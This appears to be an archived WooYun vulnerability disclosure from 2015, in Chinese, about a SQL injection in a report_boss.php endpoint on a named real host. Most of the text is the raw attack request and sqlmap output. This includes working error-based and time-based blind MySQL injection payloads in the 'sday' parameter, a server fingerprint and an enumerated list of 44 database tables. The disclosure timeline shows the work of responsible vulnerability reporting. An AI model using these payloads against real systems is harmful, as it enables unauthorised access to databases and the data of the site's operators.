乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-13: 细节已通知厂商并且等待厂商处理中 2015-12-14: 厂商已经确认,细节仅向厂商公开 2015-12-24: 细节向核心白帽子及相关领域专家公开 2016-01-03: 细节向普通白帽子公开 2016-01-13: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
POST /report_boss.php?action=save&type=month HTTP/1.1Content-Length: 340Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=cl0o5bu4m5cjjcl5hjloaqonq2Host: e.csztv.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*sday=111&staff=yaolin
sqlmap resumed the following injection point(s) from stored session:---Parameter: sday (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: sday=111') AND (SELECT 2231 FROM(SELECT COUNT(*),CONCAT(0x717a6a7071,(SELECT (ELT(2231=2231,1))),0x7171706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('rqsa'='rqsa&staff=yaolin Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: sday=111') AND (SELECT * FROM (SELECT(SLEEP(5)))SyXN) AND ('GBjD'='GBjD&staff=yaolin---web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)web application technology: Apache 2.2.22, PHP 5.3.10back-end DBMS: MySQL 5.0Database: weberp[44 tables]+----------------------+| twms_backup || twms_guest || twms_instore_main || twms_instore_sub || twms_log || twms_notice || twms_outstore_main || twms_outstore_sub || twms_prod_cate || twms_product || twms_store || twms_user || viooma_accounts || viooma_area || viooma_bank || viooma_basic || viooma_boss || viooma_categories || viooma_config || viooma_dw || viooma_flink || viooma_group || viooma_guest || viooma_gys || viooma_kc || viooma_kcbackgys || viooma_lab || viooma_mainkc || viooma_menu || viooma_none || viooma_part || viooma_pay || viooma_recordline || viooma_reportbackgys || viooma_reportnone || viooma_reportrk || viooma_reportsale || viooma_reportsback || viooma_reportswitch || viooma_sale || viooma_saleback || viooma_staff || viooma_switch || viooma_usertype |+----------------------+
危害等级:中
漏洞Rank:5
确认时间:2015-12-14 20:21
基本废弃
暂无